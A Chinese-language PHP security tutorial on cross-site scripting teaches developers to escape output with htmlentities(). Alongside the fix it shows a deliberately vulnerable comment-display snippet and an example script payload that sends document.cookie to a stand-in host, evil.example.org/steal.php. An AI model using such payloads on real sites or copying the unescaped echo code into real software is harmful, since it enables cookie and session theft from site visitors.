跨站腳本攻擊是眾所周知的攻擊方式之一。所有平台上的Web應用程式都深受其擾,PHP應用也不例外。
所有有輸入的應用都面臨風險。 Webmail,論壇,留言本,甚至是Blog。事實上,大多數Web應用程式提供輸入是出於更吸引人氣的目的,但同時這也會把自己置於危險之中。如果輸入沒有正確地進行過濾和轉義,跨站腳本漏洞就產生了。
以一個允許在每個頁面上輸入評論的應用程式為例,它使用了下面的表單來幫助使用者提交:
CODE:
<form action="comment.php" method="POST" /> <p>Name: <input type="text" name="name" /><br /> Comment: <textarea name="comment" rows="10" cols="60"></textarea><br /> <input type="submit" value="Add Comment" /></p> </form>
#程式向其他造訪該頁面的用戶顯示評論。例如,類似下面的程式碼片段可能用來輸出一個註解($comment)及與之對應的發表人($name):
##CODE:
<?php echo "<p>$name writes:<br />"; echo "<blockquote>$comment</blockquote></p>"; ?>
#這個流程對$comment及$name的值給予了充分的信任,想像一下它們中的一個的內容包含如下程式碼:
CODE:
#
<script> document.location = 'http://evil.example.org/steal.php?cookies=' + document.cookie </script>
#如果你的使用者察看這篇評論時,這與你允許別人在你的網站原始程式中加入Javascript程式碼無異。你的使用者會在不知不覺中把他們的cookies(瀏覽網站的人)送到evil.example.org,而接收程式(steal.php)可以透過$_GET['cookies']變數防問所有的cookies 。
這是一個常見的錯誤,主要是由於不好的程式設計習慣所引發的。幸運的是這類錯誤很容易避免。由於這種風險只在你輸出了被污染資料時發生,所以只要確保做到如第一章所述的過濾輸入及轉義輸出即可
## 最起碼你要用htmlentities( )對任何你要輸出到客戶端的資料進行轉義。此函數可以把所有的特殊字元轉換成HTML表示方式。所有會引起瀏覽器進行特殊處理的字元在進行了轉換後,就能確保顯示出來的是原來輸入的內容。由此,用下面的程式碼顯示註解是比較安全的:
CODE:
<?php
$clean = array();
$html = array();
/* Filter Input ($name, $comment) */
$html['name'] = htmlentities($clean['name'],
ENT_QUOTES, 'UTF-8');
$html['comment'] = htmlentities($clean['comment'],
ENT_QUOTES, 'UTF-8');
echo "<p>{$html['name']} writes:<br
/>";
echo
"<blockquote>{$html['comment']}</blockquote></p>";
?>
以上就是PHP安全-跨站腳本攻擊的內容,更多相關內容請關注PHP中文網(www.php .cn)!